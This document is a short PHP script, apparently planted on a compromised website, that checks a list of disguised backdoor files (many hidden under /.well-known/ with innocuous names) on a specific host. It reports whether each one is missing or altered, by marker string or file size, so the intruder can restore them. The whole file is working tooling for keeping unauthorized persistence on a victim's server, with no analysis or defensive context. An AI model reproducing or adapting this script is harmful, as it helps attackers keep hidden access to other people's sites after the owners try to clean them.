<?php $r = '/home/tminywse/kaykayfoods.com.pk'; $x = ["/.well-known/xajax.inc.php"=>"bd@@273019972@@token_parser_engine",
"/pdf.classified.api.php"=>"bd@@273335114@@950",
"/.well-known/AttrTypes.php"=>"bd@@250514516@@event_dispatcher",
"/pdf.class.api.php"=>"bd@@273164170@@system_core",
"/.well-known/insertfile.php"=>"bd@@272988306@@splitter_tool",
"/.well-known/ecjyufxm.php"=>"bd@@250465467@@batch_process",
"/.well-known/coupon_admin.php"=>"bd@@272994265@@publish_content",
"/wp.class.api.php"=>"bd@@273076953@@event_dispatcher",
"/.well-known/pki-validation/cqhvzkdg.php"=>"bd@@250514408@@buffer_cache",
"/.well-known/coupon.php"=>"bd@@272996333@@dependency_resolver",
"/wp.cord.api.php"=>"bd@@273340590@@83",
"/proj.classified.api.php"=>"bd@@273340607@@59",
"/cma_classified.php"=>"bd@@273340624@@74",
"/proj.cord.api.php"=>"bd@@273340629@@12",
"/proj_cord.php"=>"bd@@273340633@@50",
"/wp.classified.api.php"=>"bd@@273340635@@73",
"/cma.classified.api.php"=>"bd@@273340641@@99",
"/pdf.classified.api.php"=>"bd@@273340644@@34",
"/cma.cord.api.php"=>"bd@@273340646@@25",
"/pdf.php"=>"bd@@273159197@@dataflow_engine",
"/pdf.cord.api.php"=>"bd@@273340647@@48",
"/wp-class-api.php"=>"bd@@272978984@@config_manager"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |